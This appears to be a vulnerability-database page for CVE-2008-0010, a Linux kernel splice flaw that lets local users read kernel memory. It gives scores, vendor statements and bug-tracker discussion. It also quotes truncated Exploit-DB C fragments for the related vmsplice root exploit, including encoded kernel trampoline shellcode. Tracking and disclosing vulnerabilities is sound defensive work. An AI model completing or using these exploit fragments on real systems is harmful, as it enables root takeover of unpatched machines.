CVE-2008-0010
published 2008-02-12CVE-2008-0010: The copy_from_user_mmap_sem function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference…
PriorityP415low2.1CVSS 2.0
AVLACLAuNCPINAN
EXPLOIT
EPSS
0.89%
55.0th percentile
The copy_from_user_mmap_sem function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference, which allow local users to read from arbitrary kernel memory locations.
Affected
69 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
CVSS provenance
nvdv2.02.1LOWAV:L/AC:L/Au:N/C:P/I:N/A:N
vulncheck2.1LOW
vendor_redhat2.1LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-xpw8-fgcp-2cwc: The copy_from_user_mmap_sem function in fs/splice
ghsa_unreviewed·2022-05-01
CVE-2008-0010 [LOW] CWE-20 GHSA-xpw8-fgcp-2cwc: The copy_from_user_mmap_sem function in fs/splice
The copy_from_user_mmap_sem function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference, which allow local users to read from arbitrary kernel memory locations.
GHSA
GHSA-vv62-ccxv-738x: The vmsplice_to_pipe function in Linux kernel 2
ghsa_unreviewed·2022-05-01·CVSS 2.1
CVE-2008-0600 [LOW] CWE-94 GHSA-vv62-ccxv-738x: The vmsplice_to_pipe function in Linux kernel 2
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
VulnCheck
Linux Kernel Improper Control of Generation of Code ('Code Injection')
vulncheck·2008·CVSS 2.1
CVE-2008-0600 [LOW] Linux Kernel Improper Control of Generation of Code ('Code Injection')
Linux Kernel Improper Control of Generation of Code ('Code Injection')
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Affected: Linux Kernel
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://isc.sans.edu/diary/SSH+new+brute+force+tool/9370/
Red Hat
kernel vmsplice_to_pipe flaw
vendor_redhat·2008-02-09·CVSS 2.1
CVE-2008-0600 [LOW] CWE-119 kernel vmsplice_to_pipe flaw
kernel vmsplice_to_pipe flaw
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Statement: This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4.
Red Hat
CVE-2008-0010: The copy_from_user_mmap_sem function in fs/splice
vendor_redhat·CVSS 2.1
CVE-2008-0010 [LOW] CVE-2008-0010: The copy_from_user_mmap_sem function in fs/splice
The copy_from_user_mmap_sem function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference, which allow local users to read from arbitrary kernel memory locations.
Statement: Not vulnerable. This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
No detection rules found.
Exploit-DB
Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)
exploitdb·2008-02-09
CVE-2008-0600 Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)
Linux Kernel 2.6.17
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0
Exploit-DB
Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)
exploitdb·2008-02-09
CVE-2008-0600 Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)
Linux Kernel 2.6.23
#include
#include
#include
#include
#include
#define TARGET_PATTERN " sys_vm86old"
#define TARGET_SYSCALL 113
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4)
#define TRAMP_CODE (void *) trampoline
#define TRAMP_SIZE ( sizeof(trampoline) - 1 )
unsigned char trampoline[] =
"\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */
"\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */
"\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */
"\x75\x02" /* jne +2 */
"\xff\xd1" /* call *%ecx */
"\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */
"\xc3" /* ret */
;
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror
Bugzilla
CVE-2008-0600 kernel vmsplice_to_pipe flaw
bugzilla·2008-02-10·CVSS 2.1
CVE-2008-0600 [LOW] CVE-2008-0600 kernel vmsplice_to_pipe flaw
CVE-2008-0600 kernel vmsplice_to_pipe flaw
A new system call named vmsplice() was introduced in the 2.6.17
release of the Linux kernel.
COSEINC reported two issues affecting vmsplice, CVE-2008-0009 and CVE-2008-0010.
On Saturday 20080210 a public exploit was released that utilised a similar flaw
in vmsplice (vmsplice_to_pipe function) to allow a local user to gain privileges
on some architectures.
See also
http://marc.info/?t=120263655300003&r=1&w=2
This issue will affect kernels 2.6.17+ and therefore affected Red Hat Enterprise
Linux 5, but not Red Hat Enterprise Linux 4, 3, or 2.1.
Discussion:
Note that there may be a little confusion as there are actually three vmsplice
issues:
CVE-2008-0009 is already fixed upstream, does not affect any RHEL, has no
public exploit. Upstream pat
Bugzilla
CVE-2008-0009 kernel: Inappropriate dereference of user-supplied memory pointers
bugzilla·2008-02-01·CVSS 2.1
CVE-2008-0009 [LOW] CVE-2008-0009 kernel: Inappropriate dereference of user-supplied memory pointers
CVE-2008-0009 kernel: Inappropriate dereference of user-supplied memory pointers
Description of problem:
A new system call named vmsplice() was introduced in the 2.6.17
release of the Linux kernel.
Inappropriate dereference of user-supplied memory pointers in the
code beginning at line 1378 in the vmsplice_to_user() kernel
function (fs/splice.c):
The patch for this issue not provided by the reporter.
Discussion:
see bug #432251
---
There was a bit of confusion as the code changed since introduction 2.6.17, so
Red Hat Enterprise Linux kernels had code different to upstream.
CVE-2008-0009 and CVE-2008-0010 only affected kernels 2.6.22+ so Red Hat
Enterprise Linux was not affected
CVE-2008-0600 affected kernels 2.6.17+ so affects Red Hat Enterprise Linux 5.
Closing this CVE-2008-000
http://isec.pl/vulnerabilities/isec-0026-vmsplice_to_kernel.txthttp://secunia.com/advisories/28835http://secunia.com/advisories/28875http://secunia.com/advisories/28896http://www.debian.org/security/2008/dsa-1494http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1http://www.securityfocus.com/archive/1/487982/100/0/threadedhttp://www.securityfocus.com/bid/27704http://www.securityfocus.com/bid/27796http://www.vupen.com/english/advisories/2008/0487/referenceshttps://www.exploit-db.com/exploits/5093https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00254.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-February/msg00255.htmlhttp://isec.pl/vulnerabilities/isec-0026-vmsplice_to_kernel.txthttp://secunia.com/advisories/28835http://secunia.com/advisories/28875http://secunia.com/advisories/28896http://www.debian.org/security/2008/dsa-1494http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1http://www.securityfocus.com/archive/1/487982/100/0/threadedhttp://www.securityfocus.com/bid/27704http://www.securityfocus.com/bid/27796http://www.vupen.com/english/advisories/2008/0487/referenceshttps://www.exploit-db.com/exploits/5093https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00254.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-February/msg00255.html
2008-02-12
Published